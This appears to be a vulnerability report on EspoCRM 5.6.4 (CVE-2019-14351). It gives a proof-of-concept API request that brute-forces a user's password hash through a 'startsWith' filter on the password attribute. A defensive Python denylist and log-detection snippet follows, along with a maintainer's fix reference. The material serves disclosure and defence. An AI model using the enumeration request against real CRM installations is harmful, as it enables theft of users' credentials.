The current version of EspoCRM, 5.6.4, is vulnerable to user password hash enumeration. A malicious authenticated attacker can brute-force a user's password hash one symbol at a time using specially crafted filters.
Make the following request in your browser:
http://<HOSTNAME>/api/v1/User?filterList%5B%5D=internal&select=salutationName%2CfirstName%2ClastName%2Cname%2CuserName%2Ctitle%2CemailAddressIsOptedOut%2CemailAddress%2CemailAddressData%2CisActive&maxSize=20&offset=0&orderBy=userName&order=asc&where%5B0%5D%5Btype%5D=startsWith&where%5B0%5D%5Battribute%5D=password&where%5B0%5D%5Bvalue%5D=AAAA
If the user's password hash starts with "AAAA", the request will return information about this user; if not, the result will be empty.
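A defender-side check of the filter shape shown above, added here as an example and not EspoCRM's own code: it parses the where[] parameters of a list request, refuses any request that filters on a denied attribute, and flags matching lines in a constructed access-log sample. The denylist and the log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The PoC request from the issue above (hostname placeholder kept as-is).
POC_URL = ("http://<HOSTNAME>/api/v1/User?filterList%5B%5D=internal&maxSize=20"
           "&where%5B0%5D%5Btype%5D=startsWith"
           "&where%5B0%5D%5Battribute%5D=password"
           "&where%5B0%5D%5Bvalue%5D=AAAA")

# Assumption: attributes that must never be usable as filter targets.
DENIED_FILTER_ATTRIBUTES = {"password"}

_WHERE_ATTR = re.compile(r"^where\[(\d+)\]\[attribute\]$")


def filtered_attributes(query: str) -> dict:
    """Map where[i] index -> attribute name from a raw query string."""
    out = {}
    for key, values in parse_qs(query, keep_blank_values=True).items():
        m = _WHERE_ATTR.match(key)  # parse_qs already decodes %5B/%5D
        if m:
            out[int(m.group(1))] = values[0]
    return out


def denied_filter_attributes(url: str) -> list:
    """Attributes in the URL's where[] filters that hit the denylist."""
    attrs = filtered_attributes(urlsplit(url).query)
    return sorted(a for a in attrs.values() if a in DENIED_FILTER_ATTRIBUTES)


def is_request_allowed(url: str) -> bool:
    """Server-side gate: refuse list requests that filter on a denied attribute."""
    return not denied_filter_attributes(url)


# Constructed access-log sample (not real traffic) for a retrospective check.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - "GET /api/v1/User?where%5B0%5D%5Btype%5D=startsWith'
    '&where%5B0%5D%5Battribute%5D=password&where%5B0%5D%5Bvalue%5D=AAAA HTTP/1.1" 200',
    '10.0.0.7 - - "GET /api/v1/User?where%5B0%5D%5Battribute%5D=userName'
    '&where%5B0%5D%5Bvalue%5D=admin HTTP/1.1" 200',
]


def suspicious_log_lines(lines) -> list:
    """Return log lines whose request filtered on a denied attribute."""
    hits = []
    for line in lines:
        m = re.search(r'"GET (\S+) HTTP', line)
        if m and denied_filter_attributes(m.group(1)):
            hits.append(line)
    return hits
```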
Thanks. It's a recent regression. Fix: 5b8dba6
https://nvd.nist.gov/vuln/detail/CVE-2019-14351 has been assigned for this issue.